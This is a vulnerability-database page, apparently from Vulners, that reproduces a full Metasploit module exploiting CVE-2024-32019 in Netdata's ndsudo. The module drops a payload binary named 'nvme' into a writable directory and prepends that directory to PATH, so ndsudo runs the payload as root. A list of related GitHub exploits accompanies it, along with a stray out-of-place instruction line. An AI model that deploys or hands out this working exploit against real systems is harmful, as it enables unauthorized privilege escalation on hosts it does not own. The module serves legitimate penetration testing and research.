Lucene search
K

Netdata ndsudo privilege escalation

🗓️ 20 Aug 2025 18:56:18Reported by msutovsky-r7, mia-0Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 468 Views

Please provide the input as an array of objects with id and description.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2024-32019
6 Aug 202522:49
githubexploit
GithubExploit
Exploit for CVE-2024-32019
3 Aug 202511:05
githubexploit
GithubExploit
Exploit for CVE-2024-34070
18 May 202617:23
githubexploit
GithubExploit
Exploit for CVE-2024-32019
18 May 202617:23
githubexploit
GithubExploit
Exploit for CVE-2024-32019
3 Aug 202504:41
githubexploit
GithubExploit
Exploit for CVE-2024-32019
30 Sep 202511:37
githubexploit
GithubExploit
Exploit for CVE-2024-32019
11 Sep 202500:06
githubexploit
GithubExploit
Exploit for CVE-2024-32019
26 Nov 202500:34
githubexploit
GithubExploit
Exploit for CVE-2024-32019
1 Nov 202521:58
githubexploit
GithubExploit
Exploit for CVE-2024-32019
16 Aug 202511:18
githubexploit
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Kernel
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Netdata ndsudo privilege escalation',
        'Description' => %q{
          The `ndsudo` is a tool shipped with Netdata Agent. The version v1.45.0 and below contain vulnerability, which allows an attacker to gain privilege escalation using `ndsudo` binary. The vulnerability is untrusted search path, when searching for additional binary files, such as `nvme`. An attacker can create malicious binary with same name and add the directory of this binary into `$PATH` variable. The `ndsudo` will trust the first occurence of this binary and execute it.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'msutovsky-r7', # msf module
          'mia-0' # security researcher
        ],
        'Platform' => [ 'linux' ],
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'Targets' => [[ 'Auto', {} ]],
        'Privileged' => true,
        'References' => [
          [ 'GHSA', 'pmhq-4cxq-wj93', 'netdata/netdata' ],
          [ 'CVE', '2024-32019']
        ],
        'DisclosureDate' => '2024-04-12',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
      OptString.new('NdsudoPath', [ true, 'A path to ndsudo binary on the target system', '/usr/libexec/netdata/plugins.d/ndsudo'])
    ]
  end

  def check
    # could not find reasonable way to get version
    return CheckCode::Safe('Vulnerable binary not detected, check NdsudoPath option') unless file?(datastore['NdsudoPath']) && executable?(datastore['NdsudoPath'])
    return CheckCode::Unknown('Failed to run vulnerable binary, either binary is not ndsudo or user does not have right to execute ndsudo') unless cmd_exec(datastore['NdsudoPath']) == 'at least 2 parameters are needed, but 1 were given.'

    CheckCode::Appears('Vulnerable binary detected')
  end

  def exploit
    base_dir = datastore['WritableDir']
    if !datastore['ForceExploit'] && is_root?
      fail_with(Failure::None, 'Session already has root privileges. Set ForceExploit to override')
    end

    unless writable? base_dir
      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
    end

    executable_path = "#{base_dir}/nvme"
    vprint_status("Creating malicious file at #{executable_path}")

    fail_with(Failure::PayloadFailed, 'Failed to upload malicious binary') unless upload_and_chmodx(executable_path, generate_payload_exe)

    register_files_for_cleanup(executable_path)

    vprint_status('Executing..')

    cmd_exec("PATH=#{base_dir}:$PATH '#{datastore['NdsudoPath']}' nvme-list")
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Jul 2026 19:01Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.18.8
EPSS0.01165
SSVC
468